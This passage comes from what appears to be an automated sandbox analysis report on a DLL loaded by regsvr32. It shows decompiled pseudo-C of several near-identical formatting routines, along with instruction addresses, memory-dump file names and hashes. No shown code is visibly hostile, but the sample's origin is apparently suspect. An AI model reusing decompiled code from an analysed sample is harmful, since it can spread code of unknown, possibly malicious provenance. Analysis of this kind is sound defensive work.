                                                                      				if (_t44 - 0x45 - 2 <= 0) goto 0x8003d32b;
                                                                      				sil = 0;
                                                                      				goto 0x8003d32e;
                                                                      				sil = 1;
                                                                      				if (0 != 0) goto 0x8003d425;
                                                                      				if ( *_t49 >> 0x34 != 0x7ff) goto 0x8003d425;
                                                                      				r8d = 0xc;
                                                                      			}










                                                                      0x18003d290
                                                                      0x18003d295
                                                                      0x18003d29f
                                                                      0x18003d2a5
                                                                      0x18003d2ab
                                                                      0x18003d2ad
                                                                      0x18003d2b8
                                                                      0x18003d2bd
                                                                      0x18003d2c1
                                                                      0x18003d2c4
                                                                      0x18003d2ca
                                                                      0x18003d2cd
                                                                      0x18003d2d4
                                                                      0x18003d2db
                                                                      0x18003d2e3
                                                                      0x18003d2e5
                                                                      0x18003d2f2
                                                                      0x18003d2f7
                                                                      0x18003d2fb
                                                                      0x18003d2fe
                                                                      0x18003d303
                                                                      0x18003d310
                                                                      0x18003d31c
                                                                      0x18003d324
                                                                      0x18003d326
                                                                      0x18003d329
                                                                      0x18003d32b
                                                                      0x18003d339
                                                                      0x18003d354
                                                                      0x18003d367

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b3ae64f05476cfc27407111d57bd1260e1db655d337cf3c4350657d8c0e4ea1
                                                                      • Instruction ID: 34439b425027ccedbb94cebfe96a6402997814a43ff497730d5e8584598be847
                                                                      • Opcode Fuzzy Hash: 7b3ae64f05476cfc27407111d57bd1260e1db655d337cf3c4350657d8c0e4ea1
                                                                      • Instruction Fuzzy Hash: C181D57260478C46EBF6CB29B4403AB6791F38A7D4F558216FA9A47BD5CF3CC6488B01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74815bec7c38ce69cb05782c43fda4e3041f6ac64408093f0fbb5e5cac3a6eb4
                                                                      • Instruction ID: 743ec5fefe4f31b7e4bd13dec8465eaffa7227c7c6e82a890131d55f4654d772
                                                                      • Opcode Fuzzy Hash: 74815bec7c38ce69cb05782c43fda4e3041f6ac64408093f0fbb5e5cac3a6eb4
                                                                      • Instruction Fuzzy Hash: 6851743551C7849FC368DF68C88676BB7E1FB85314F505A1DE9CAC3210D770A8528B43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001C00C(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001c0eb;
                                                                      				if (_t110 == 0) goto 0x8001c065;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001c13f;
                                                                      				if (_t111 == 0) goto 0x8001c0bb;
                                                                      				if (_t111 == 0) goto 0x8001c08c;
                                                                      				if (_t111 == 0) goto 0x8001c13f;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001c10b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c168;
                                                                      				E00000001180024F6C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c16d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c0b1;
                                                                      				_t70 = E00000001180024B48( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c16d;
                                                                      				E00000001180024C54(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001c16d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001c0e1;
                                                                      				_t74 = E00000001180024934( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c16d;
                                                                      				E00000001180024A40(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001c16d;
                                                                      				if (_t115 == 0) goto 0x8001c065;
                                                                      				if (_t115 == 0) goto 0x8001c065;
                                                                      				if (_t115 == 0) goto 0x8001c065;
                                                                      				goto 0x8001c053;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001c223;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001c161;
                                                                      				_t80 = E00000001180024D5C( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001c16d;
                                                                      				_t81 = E00000001180024E64(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001c16d;
                                                                      				E00000001180025074(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001c138;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001c187;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001c221;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001c1a5;
                                                                      				if (_t153 >= 0) goto 0x8001c1a5;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001c1b4;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001c1cb;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E00000001180023018(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001c1d4;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t163 != _t163) goto 0x8001c1ed;
                                                                      				E000000011800252C4(0, _t132, _t154, _t162);
                                                                      				goto 0x8001c1f4;
                                                                      				E0000000118002534C(__esi, _t132, _t162);
                                                                      				if (0 == 0) goto 0x8001c221;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001c212;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001c221;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}























                                                                      0x18001c00c
                                                                      0x18001c011
                                                                      0x18001c016
                                                                      0x18001c027
                                                                      0x18001c02a
                                                                      0x18001c02d
                                                                      0x18001c030
                                                                      0x18001c036
                                                                      0x18001c039
                                                                      0x18001c03f
                                                                      0x18001c041
                                                                      0x18001c043
                                                                      0x18001c04c
                                                                      0x18001c051
                                                                      0x18001c056
                                                                      0x18001c05f
                                                                      0x18001c06c
                                                                      0x18001c07c
                                                                      0x18001c082
                                                                      0x18001c087
                                                                      0x18001c093
                                                                      0x18001c0a5
                                                                      0x18001c0a7
                                                                      0x18001c0ac
                                                                      0x18001c0b1
                                                                      0x18001c0b6
                                                                      0x18001c0c2
                                                                      0x18001c0d2
                                                                      0x18001c0d5
                                                                      0x18001c0d7
                                                                      0x18001c0dc
                                                                      0x18001c0e1
                                                                      0x18001c0e6
                                                                      0x18001c0ee
                                                                      0x18001c0f7
                                                                      0x18001c100
                                                                      0x18001c106
                                                                      0x18001c10b
                                                                      0x18001c10f
                                                                      0x18001c112
                                                                      0x18001c119
                                                                      0x18001c11d
                                                                      0x18001c128
                                                                      0x18001c12d
                                                                      0x18001c133
                                                                      0x18001c13a
                                                                      0x18001c146
                                                                      0x18001c158
                                                                      0x18001c15a
                                                                      0x18001c15f
                                                                      0x18001c161
                                                                      0x18001c166
                                                                      0x18001c168
                                                                      0x18001c16f
                                                                      0x18001c178
                                                                      0x18001c181
                                                                      0x18001c18c
                                                                      0x18001c195
                                                                      0x18001c19a
                                                                      0x18001c19c
                                                                      0x18001c19f
                                                                      0x18001c1a2
                                                                      0x18001c1a9
                                                                      0x18001c1ab
                                                                      0x18001c1b2
                                                                      0x18001c1bf
                                                                      0x18001c1c6
                                                                      0x18001c1ce
                                                                      0x18001c1d0
                                                                      0x18001c1d4
                                                                      0x18001c1d8
                                                                      0x18001c1e1
                                                                      0x18001c1e6
                                                                      0x18001c1eb
                                                                      0x18001c1ef
                                                                      0x18001c1fc
                                                                      0x18001c207
                                                                      0x18001c210
                                                                      0x18001c212
                                                                      0x18001c21b
                                                                      0x18001c21e
                                                                      0x18001c23b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e7c3a7e305c0986238cc0504b4b45c88e8e6ad337abf26618f403569d78a01df
                                                                      • Instruction ID: 62516b9d72a4ea4f402e18d03147f0c50b2069d1536ad59bd844c430b145374c
                                                                      • Opcode Fuzzy Hash: e7c3a7e305c0986238cc0504b4b45c88e8e6ad337abf26618f403569d78a01df
                                                                      • Instruction Fuzzy Hash: DA51B472540A5892F7A79F28C054BED23A0F70EBDCF158215FA450B6CACF75CA49C74A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E0000000118001C23C(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t162;
                                                                      				void* _t163;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x8001c31b;
                                                                      				if (_t110 == 0) goto 0x8001c295;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x8001c36f;
                                                                      				if (_t111 == 0) goto 0x8001c2eb;
                                                                      				if (_t111 == 0) goto 0x8001c2bc;
                                                                      				if (_t111 == 0) goto 0x8001c36f;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x8001c33b;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c398;
                                                                      				E00000001180024F6C( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c39d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001c2e1;
                                                                      				_t70 = E00000001180024B48( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c39d;
                                                                      				E00000001180024C54(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001c39d;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x8001c311;
                                                                      				_t74 = E00000001180024934( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x8001c39d;
                                                                      				E00000001180024A40(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x8001c39d;
                                                                      				if (_t115 == 0) goto 0x8001c295;
                                                                      				if (_t115 == 0) goto 0x8001c295;
                                                                      				if (_t115 == 0) goto 0x8001c295;
                                                                      				goto 0x8001c283;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x8001c453;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x8001c391;
                                                                      				_t80 = E00000001180024D5C( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x8001c39d;
                                                                      				_t81 = E00000001180024E64(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x8001c39d;
                                                                      				E00000001180025074(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x8001c368;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x8001c3b7;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x8001c451;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x8001c3d5;
                                                                      				if (_t153 >= 0) goto 0x8001c3d5;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x8001c3e4;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x8001c3fb;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E00000001180023018(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x8001c404;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t163 != _t163) goto 0x8001c41d;
                                                                      				E000000011800253D4(_t132, _t154);
                                                                      				goto 0x8001c424;
                                                                      				E00000001180025494(__esi, _t132, _t154, _t162);
                                                                      				if (0 == 0) goto 0x8001c451;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x8001c442;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x8001c451;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}























                                                                      0x18001c23c
                                                                      0x18001c241
                                                                      0x18001c246
                                                                      0x18001c257
                                                                      0x18001c25a
                                                                      0x18001c25d
                                                                      0x18001c260
                                                                      0x18001c266
                                                                      0x18001c269
                                                                      0x18001c26f
                                                                      0x18001c271
                                                                      0x18001c273
                                                                      0x18001c27c
                                                                      0x18001c281
                                                                      0x18001c286
                                                                      0x18001c28f
                                                                      0x18001c29c
                                                                      0x18001c2ac
                                                                      0x18001c2b2
                                                                      0x18001c2b7
                                                                      0x18001c2c3
                                                                      0x18001c2d5
                                                                      0x18001c2d7
                                                                      0x18001c2dc
                                                                      0x18001c2e1
                                                                      0x18001c2e6
                                                                      0x18001c2f2
                                                                      0x18001c302
                                                                      0x18001c305
                                                                      0x18001c307
                                                                      0x18001c30c
                                                                      0x18001c311
                                                                      0x18001c316
                                                                      0x18001c31e
                                                                      0x18001c327
                                                                      0x18001c330
                                                                      0x18001c336
                                                                      0x18001c33b
                                                                      0x18001c33f
                                                                      0x18001c342
                                                                      0x18001c349
                                                                      0x18001c34d
                                                                      0x18001c358
                                                                      0x18001c35d
                                                                      0x18001c363
                                                                      0x18001c36a
                                                                      0x18001c376
                                                                      0x18001c388
                                                                      0x18001c38a
                                                                      0x18001c38f
                                                                      0x18001c391
                                                                      0x18001c396
                                                                      0x18001c398
                                                                      0x18001c39f
                                                                      0x18001c3a8
                                                                      0x18001c3b1
                                                                      0x18001c3bc
                                                                      0x18001c3c5
                                                                      0x18001c3ca
                                                                      0x18001c3cc
                                                                      0x18001c3cf
                                                                      0x18001c3d2
                                                                      0x18001c3d9
                                                                      0x18001c3db
                                                                      0x18001c3e2
                                                                      0x18001c3ef
                                                                      0x18001c3f6
                                                                      0x18001c3fe
                                                                      0x18001c400
                                                                      0x18001c404
                                                                      0x18001c408
                                                                      0x18001c411
                                                                      0x18001c416
                                                                      0x18001c41b
                                                                      0x18001c41f
                                                                      0x18001c42c
                                                                      0x18001c437
                                                                      0x18001c440
                                                                      0x18001c442
                                                                      0x18001c44b
                                                                      0x18001c44e
                                                                      0x18001c46b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 58aa7c0f36bcc81448f99f2d25b83106e049a9560014bfc539c1794346c9ac0a
                                                                      • Instruction ID: ad92f54dbac273fae439fe3b3c2bb6a81441d2ec749c090bc850cb5445ae63dc
                                                                      • Opcode Fuzzy Hash: 58aa7c0f36bcc81448f99f2d25b83106e049a9560014bfc539c1794346c9ac0a
                                                                      • Instruction Fuzzy Hash: D9519172104A4882EBA78E288055BEC23A0E74CBDCF15C215FA590B6C9CF75CB49C34A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00000001180019AE4(void* __edx, void* __esi, long long __rbx, void* __rcx, long long __rdi, long long __rsi, signed int _a8, long long _a16, long long _a24, long long _a32) {
                                                                      				long long _v32;
                                                                      				signed long long _v40;
                                                                      				void* __rbp;
                                                                      				void* _t70;
                                                                      				void* _t74;
                                                                      				void* _t80;
                                                                      				void* _t81;
                                                                      				intOrPtr _t92;
                                                                      				signed int _t101;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t115;
                                                                      				intOrPtr _t129;
                                                                      				void* _t132;
                                                                      				signed long long _t153;
                                                                      				signed long long _t154;
                                                                      				void* _t157;
                                                                      				void* _t160;
                                                                      				void* _t162;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t132 = __rcx;
                                                                      				r14b = __edx;
                                                                      				_t92 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				r15d = 8;
                                                                      				_t110 = _t92 - 5;
                                                                      				if (_t110 > 0) goto 0x80019bc3;
                                                                      				if (_t110 == 0) goto 0x80019b3d;
                                                                      				_t111 = _t92;
                                                                      				if (_t111 == 0) goto 0x80019c17;
                                                                      				if (_t111 == 0) goto 0x80019b93;
                                                                      				if (_t111 == 0) goto 0x80019b64;
                                                                      				if (_t111 == 0) goto 0x80019c17;
                                                                      				if (_t92 - 0xffffffffffffffff != 1) goto 0x80019be3;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x80019c40;
                                                                      				E00000001180022E08( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x80019c45;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x80019b89;
                                                                      				_t70 = E000000011800229E4( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x80019c45;
                                                                      				E00000001180022AF0(_t70, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x80019c45;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				_t115 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t115 == 0) goto 0x80019bb9;
                                                                      				_t74 = E000000011800227D0( *(__rcx + 0x28) >> 4, __rcx, __rcx,  &_a8);
                                                                      				goto 0x80019c45;
                                                                      				E000000011800228DC(_t74, __rcx, __rcx,  &_a8, _t160);
                                                                      				goto 0x80019c45;
                                                                      				if (_t115 == 0) goto 0x80019b3d;
                                                                      				if (_t115 == 0) goto 0x80019b3d;
                                                                      				if (_t115 == 0) goto 0x80019b3d;
                                                                      				goto 0x80019b2b;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v32 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v40 = _v40 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx,  &_a8, __rsi, _t157, _t160);
                                                                      				goto 0x80019cfb;
                                                                      				_a8 = _a8 & 0x00000000;
                                                                      				if (0 == 0) goto 0x80019c39;
                                                                      				_t80 = E00000001180022BF8( *(_t132 + 0x28) >> 4, _t132, _t132,  &_a8);
                                                                      				goto 0x80019c45;
                                                                      				_t81 = E00000001180022D00(_t80, _t132, _t132,  &_a8, _t160);
                                                                      				goto 0x80019c45;
                                                                      				E00000001180022F10(_t81, _t132, _t132,  &_a8);
                                                                      				if (0 == 0) goto 0x80019c10;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x470)) != 1) goto 0x80019c5f;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x474)) != 1) goto 0x80019cf9;
                                                                      				_t153 = _a8;
                                                                      				if (0 == 0) goto 0x80019c7d;
                                                                      				if (_t153 >= 0) goto 0x80019c7d;
                                                                      				_t154 =  ~_t153;
                                                                      				_t101 =  *(_t132 + 0x28) | 0x00000040;
                                                                      				 *(_t132 + 0x28) = _t101;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x30)) >= 0) goto 0x80019c8c;
                                                                      				 *((intOrPtr*)(_t132 + 0x30)) = 1;
                                                                      				goto 0x80019ca3;
                                                                      				 *(_t132 + 0x28) = _t101 & 0xfffffff7;
                                                                      				E00000001180023018(_t132, _t132 + 0x50,  *((intOrPtr*)(_t132 + 0x30)), _t154,  *((intOrPtr*)(_t132 + 8)));
                                                                      				if (_t154 != 0) goto 0x80019cac;
                                                                      				 *(_t132 + 0x28) =  *(_t132 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t132 + 0x4c)) = 1;
                                                                      				r8b = r14b;
                                                                      				if (_t162 != _t162) goto 0x80019cc5;
                                                                      				E000000011800230C4(0, _t132, _t154);
                                                                      				goto 0x80019ccc;
                                                                      				E00000001180023168(__esi, _t132);
                                                                      				if (0 == 0) goto 0x80019cf9;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x48)) == 0) goto 0x80019cea;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t132 + 0x40)))) == 0x30) goto 0x80019cf9;
                                                                      				 *((long long*)(_t132 + 0x40)) =  *((long long*)(_t132 + 0x40)) + 0xfffffffe;
                                                                      				 *((short*)( *((intOrPtr*)(_t132 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t132 + 0x48)) =  *((intOrPtr*)(_t132 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}






















                                                                      0x180019ae4
                                                                      0x180019ae9
                                                                      0x180019aee
                                                                      0x180019aff
                                                                      0x180019b02
                                                                      0x180019b05
                                                                      0x180019b08
                                                                      0x180019b0e
                                                                      0x180019b11
                                                                      0x180019b17
                                                                      0x180019b19
                                                                      0x180019b1b
                                                                      0x180019b24
                                                                      0x180019b29
                                                                      0x180019b2e
                                                                      0x180019b37
                                                                      0x180019b44
                                                                      0x180019b54
                                                                      0x180019b5a
                                                                      0x180019b5f
                                                                      0x180019b6b
                                                                      0x180019b7d
                                                                      0x180019b7f
                                                                      0x180019b84
                                                                      0x180019b89
                                                                      0x180019b8e
                                                                      0x180019b9a
                                                                      0x180019baa
                                                                      0x180019bad
                                                                      0x180019baf
                                                                      0x180019bb4
                                                                      0x180019bb9
                                                                      0x180019bbe
                                                                      0x180019bc6
                                                                      0x180019bcf
                                                                      0x180019bd8
                                                                      0x180019bde
                                                                      0x180019be3
                                                                      0x180019be7
                                                                      0x180019bea
                                                                      0x180019bf1
                                                                      0x180019bf5
                                                                      0x180019c00
                                                                      0x180019c05
                                                                      0x180019c0b
                                                                      0x180019c12
                                                                      0x180019c1e
                                                                      0x180019c30
                                                                      0x180019c32
                                                                      0x180019c37
                                                                      0x180019c39
                                                                      0x180019c3e
                                                                      0x180019c40
                                                                      0x180019c47
                                                                      0x180019c50
